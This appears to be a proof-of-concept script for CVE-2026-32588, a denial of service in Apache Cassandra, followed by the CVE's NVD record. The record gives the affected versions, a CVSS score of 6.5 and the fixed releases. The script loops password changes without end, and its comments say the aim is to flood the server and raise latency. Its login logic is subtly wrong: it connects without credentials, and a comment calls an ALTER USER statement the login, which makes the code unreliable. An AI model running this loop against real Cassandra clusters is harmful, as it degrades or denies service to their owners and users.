CVE-2026-32588

# PoC for CVE-2026-32588 (Authenticated DoS in Apache Cassandra) # This script simulates repeated password changes to increase query latency. # Requires: pip install cassandra-driver from cassandra.cluster import Cluster import time TARGET_HOST = '127.0.0.1' TARGET_PORT = 9042 USERNAME = 'cassandra' PASSWORD = 'cassandra' print(f"[*] Connecting to {TARGET_HOST}:{TARGET_PORT}...") cluster = Cluster([TARGET_HOST], port=TARGET_PORT) session = cluster.connect() # Login using credentials session.execute(f"ALTER USER {USERNAME} WITH PASSWORD '{PASSWORD}'") print("[+] Connected. Starting DoS loop...") try: while True: # Repeatedly change the password to trigger the latency spike # In a real scenario, this loops indefinitely to degrade performance query = f"ALTER USER {USERNAME} WITH PASSWORD '{PASSWORD}'" session.execute(query) print(f"[+] Executed: {query} | Latency increasing...") time.sleep(0.1) # Minimal delay to flood the server except Exception as e: print(f"[-] Exception occurred: {e}") finally: cluster.shutdown() print("[*] Connection closed.")

{"cve": {"id": "CVE-2026-32588", "sourceIdentifier": "[email protected]", "published": "2026-04-07T17:16:28.297", "lastModified": "2026-04-15T15:45:40.473", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Authenticated DoS over CQL in Apache Cassandra 4.0, 4.1, 5.0 allows authenticated user to raise query latencies via repeated password changes.\nUsers are recommended to upgrade to version 4.0.20, 4.1.11, 5.0.7, which fixes this issue."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apache:cassandra:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.0.0", "versionEndExcluding": "4.0.20", "matchCriteriaId": "C531A747-3AEF-4CDC-B614-784DC3B6213E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:apache:cassandra:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.1.0", "versionEndExcluding": "4.1.11", "matchCriteriaId": "2CA46AD5-4A57-43F1-889E-7A77FBC3B6A8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:apache:cassandra:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.0.0", "versionEndExcluding": "5.0.7", "matchCriteriaId": "31249BDD-7A3E-4B31-A274-4C7237920C6C"}]}]}], "references": [{"url": "https://lists.apache.org/thread/2tnwjdnss378glxrsmnlzz3k53ftphrc", "source": "[email protected]", "tags": ["Mailing List", "Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/04/07/9", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Third Party Advisory"]}]}}